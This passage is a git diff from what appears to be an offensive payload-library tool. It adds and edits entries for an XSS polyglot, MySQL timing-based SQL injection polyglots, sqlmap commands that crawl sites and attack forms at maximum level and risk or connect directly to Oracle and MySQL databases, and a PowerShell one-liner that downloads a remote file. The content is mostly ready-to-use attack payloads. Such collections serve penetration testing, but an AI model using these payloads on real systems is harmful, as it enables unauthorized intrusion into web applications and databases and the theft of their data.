https://twitter.com/0xsobky +Load({ payload: "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/\\x3e", title: "XSS polyglot locator", category: "XSS"}) + + // ####### sqlmap ######### +Load({ payload: "SLEEP() /*' or SLEEP() or '\" or SLEEP() or \"*/", title: "SQLi Polyglot", category: "SQLi", +callback: function(bro){ + question("How many seconds would you like to sleep for?"); + ask.some(questions, bro); +}}) + +// Credit to Detectify https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/ +Load({ payload: "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR\"*/", title: "SQLi (MySQL) Polyglot", category: "SQLi"}) + + +Load({ + title: "Use sqlmap to crawl and scan for SQLi", + payload: "sqlmap -u '' --forms --batch --crawl=10 --level=5 --risk=3 --cookie=''", + category: "SQLi", + callback: function(bro){ + question("What URL would you like to scan?"); + question("What cookies would you like to include?"); + ask.some(questions, bro); + } +}) + Load({ title: "Use sqlmap to directly connect to an Oracle db (requires Oracle instant client)", - payload: "sqlmap -d 'oracle://@:/'", + payload: "sqlmap -d 'oracle://@:/'", category: "SQLi", callback: function(bro){ question("What DB credentials would you like to use? (Enter as username:password)"); + question("Whats the SID of the DB? (ex: testdb)"); ask.some(questions, bro); } }) Load({ title: "Use sqlmap to directly connect to a MySQL db", - payload: "sqlmap -d 'mysql://@:/'", + payload: "sqlmap -d 'mysql://@:/'", category: "SQLi", callback: function(bro){ question("What DB credentials would you like to use? (Enter as username:password)"); + question("Whats the name of the DB? (ex: testdb)"); ask.some(questions, bro); } }) -// sqlmap -d "mysql://:@:/" /* ###################################################### diff --git a/payloads/windows.js b/payloads/windows.js index 512499b..0d82c37 100644 --- a/payloads/windows.js +++ b/payloads/windows.js @@ -157,10 +157,11 @@ Load({ Load({ title: "Download File", - payload: '(new-object system.net.webclient).downloadFile("","")', + payload: '(new-object system.net.webclient).downloadFile("","")', category: "Powershell", callback: function(bro){ question("What is the full URI path of the hosted file? (ex: http://foo.bar/bro.zip)") + question("Where would you like to save it? (ex: C:\\TEMP\\bro.zip)"); ask.some(questions, bro); }